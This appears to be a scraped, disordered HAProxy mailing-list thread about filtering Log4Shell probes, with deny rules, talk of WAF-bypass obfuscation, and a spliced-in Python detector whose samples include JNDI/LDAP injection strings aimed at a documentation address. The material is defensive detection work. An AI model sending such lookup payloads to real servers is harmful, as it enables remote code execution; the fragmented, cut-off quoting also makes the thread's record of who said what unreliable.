Hi.
On 14.12.21 10:18, Olivier D wrote:
Hi,
On Mon, 13 Dec 2021 at 19:38, John Lauro <johnala...@gmail.com> wrote:
http-request deny deny_status 405 if { url_sub -i "\$\{jndi:" or hdr_sub(user-agent) -i "\$\{jndi:" }
was not catching the bad traffic. I think the escapes
Hi,
On Mon, 13 Dec 2021 at 19:38, John Lauro wrote:
> http-request deny deny_status 405 if { url_sub -i "\$\{jndi:" or
> hdr_sub(user-agent) -i "\$\{jndi:" }
> was not catching the bad traffic. I think the escapes were causing issues
> in the matching.
>
> The following did work:
>
From: Nicolas CARPi
Sent: Tuesday, 14 December 2021, 10:27
To: Jonathan Matthews
Cc: Olivier D; HAProxy
Subject: Re: Blocking log4j CVE with HAProxy
On 13 Dec, Jonathan Matthews wrote:
> I believe there are string casing operators available, leading to
> options like "${j{$lower:N}di:ldap://...".
Indeed. Maybe this can help, it's the "Bypass WAF" part of the POC[0]:
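The bypass Jonathan and Nicolas mention is the reason a plain substring ACL on "${jndi:" (as in John's http-request deny line) cannot be relied on: Log4j evaluates nested lookups such as ${lower:j}, ${upper:j} and the "key:-default" fallback (${::-j}, ${env:NaN:-j}) before it ever sees the string "jndi:", so the wire bytes need not contain it. The following is an added example, not code from this thread or from HAProxy: a small Python detector that first percent-decodes the value, then evaluates innermost lookups the way Log4j's substitutor would, and only then looks for "${jndi:". It is a simplified model of the substitutor (it handles lower:, upper: and the :-default fallback, and deliberately does not consult env:, sys: or any other real lookup, so an attacker-supplied default always wins); the request lines in SAMPLE_REQUESTS are constructed, and 203.0.113.7 is a documentation address.

```python
import re
from urllib.parse import unquote

# An innermost lookup: "${...}" whose body contains no further "$", "{" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we actually want to match once the obfuscation has been peeled off.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Evaluate one innermost lookup body as far as a detector needs to.

    lower:/upper: transform their argument; "key:-default" collapses to the
    default for any lookup we do not resolve (simplified model, assumption:
    env:, sys:, date: etc. are never consulted, the attacker's default wins).
    Returns None to leave the lookup untouched: a jndi: lookup (the thing we
    match on) or an unknown lookup with no default.
    """
    prefix, sep, _ = body.partition(":")
    if prefix.strip().lower() == "jndi":
        return None
    default = None
    if ":-" in body:
        body, default = body.split(":-", 1)
        prefix, sep, _ = body.partition(":")
    key = body[len(prefix) + 1:] if sep else ""
    name = prefix.strip().lower()
    if sep and name == "lower":
        return key.lower()
    if sep and name == "upper":
        return key.upper()
    return default


def normalize(value: str, max_passes: int = 64) -> str:
    """Evaluate innermost lookups repeatedly until the string stops changing."""
    s = value
    for _ in range(max_passes):
        changed = False

        def repl(m):
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        s = INNERMOST.sub(repl, s)
        if not changed:
            break
    return s


def url_decode(value: str, max_rounds: int = 3) -> str:
    """Undo (possibly repeated) percent-encoding, e.g. %24%7B -> ${."""
    s = value
    for _ in range(max_rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def is_log4shell_probe(value: str) -> bool:
    """True if the value carries a jndi lookup after decoding and de-obfuscation."""
    return JNDI.search(normalize(url_decode(value))) is not None


# Constructed sample request lines (URL plus User-Agent), not real traffic.
SAMPLE_REQUESTS = [
    'GET /?x=${jndi:ldap://203.0.113.7/a} HTTP/1.1 UA="curl/7.68.0"',
    'GET / HTTP/1.1 UA="${${lower:j}ndi:ldap://203.0.113.7/a}"',
    'GET / HTTP/1.1 UA="${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.7/a}"',
    'GET / HTTP/1.1 UA="${${env:NaN:-j}ndi:${lower:LDAP}://203.0.113.7/a}"',
    'GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fa%7D HTTP/1.1 UA="Mozilla/5.0"',
    'GET /index.html HTTP/1.1 UA="Mozilla/5.0 (X11; Linux x86_64)"',
    'GET /?msg=${HOME} HTTP/1.1 UA="Mozilla/5.0"',
]


def scan_requests(lines):
    """Return the request lines that are log4shell probes; the first five
    samples above are flagged, the last two are not."""
    return [line for line in lines if is_log4shell_probe(line)]


if __name__ == "__main__":
    for line in scan_requests(SAMPLE_REQUESTS):
        print("BLOCK", line)
```

A literal match on "${jndi:" catches only the first and fifth sample; the other three probes reach the same string only after the lookups are evaluated, which is exactly what url_sub and hdr_sub cannot do. This is also why the thread's other point stands: a proxy-side filter lowers the scanner noise but does not replace patching the library.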
On Mon, 13 Dec 2021 at 19:51, Valters Jansons wrote:
>
> Is this thread really "on-topic" for HAProxy?
>
> Attempts to mitigate Log4Shell at HAProxy level to me feel similar
> to.. looking at a leaking roof of a house and thinking "I should put
> an umbrella above it, so the leak isn't hit by
Valters,
On 12/13/21 7:51 PM, Valters Jansons wrote:
Is this thread really "on-topic" for HAProxy?
"I want to block specific pattern in a header" certainly is on-topic for
the HAProxy list.
Attempts to mitigate Log4Shell at HAProxy level to me feel similar
to.. looking at a leaking roof
Is this thread really "on-topic" for HAProxy?
Attempts to mitigate Log4Shell at HAProxy level to me feel similar
to.. looking at a leaking roof of a house and thinking "I should put
an umbrella above it, so the leak isn't hit by rain". Generally, it
might work, but it's not something that you can
http-request deny deny_status 405 if { url_sub -i "\$\{jndi:" or
hdr_sub(user-agent) -i "\$\{jndi:" }
was not catching the bad traffic. I think the escapes were causing issues
in the matching.
The following did work:
http-request deny deny_status 405 if { url_sub -i -f
On Mon, 13 Dec 2021 at 12:51, Olivier D wrote:
> If you don't know yet, a CVE was published on friday about library log4j,
> allowing a remote code execution with a crafted HTTP request.
[snip]
> We would like to filter these requests on HAProxy to lower the exposition. At
> peak times, 20% of
On 13.12.21 14:53, Lukas Tribus wrote:
On Mon, 13 Dec 2021 at 14:43, Aleksandar Lazic wrote:
Well I go the other way around.
The application must know what data are allowed, verify the input and if the
input is not valid discard it.
You clearly did not understand my point so let me try
On Mon, 13 Dec 2021 at 14:43, Aleksandar Lazic wrote:
> Well I go the other way around.
>
> The application must know what data are allowed, verify the input and if the
> input is not valid discard it.
You clearly did not understand my point so let me try to phrase it differently:
The log4j
On 13.12.21 14:03, Lukas Tribus wrote:
On Mon, 13 Dec 2021 at 13:25, Aleksandar Lazic wrote:
1. Why is an input from outside of the application passed unchecked to the
logging library!
Because you can't predict the future.
When you know that your backend is SQL, you escape what's necessary
On Mon, 13 Dec 2021 at 13:25, Aleksandar Lazic wrote:
> 1. Why is an input from outside of the application passed unchecked to the
> logging library!
Because you can't predict the future.
When you know that your backend is SQL, you escape what's necessary to
avoid SQL injection (or use
On 13.12.21 11:48, Olivier D wrote:
Hello there,
If you don't know yet, a CVE was published on friday about library log4j,
allowing a remote code execution
with a crafted HTTP request.
We would like to filter these requests on HAProxy to lower the exposition. At
peak times, 20% of our web
Hello there,
If you don't know yet, a CVE was published on friday about library log4j,
allowing a remote code execution with a crafted HTTP request.
We would like to filter these requests on HAProxy to lower the exposition.
At peak times, 20% of our web traffic is scanners about this bug !
The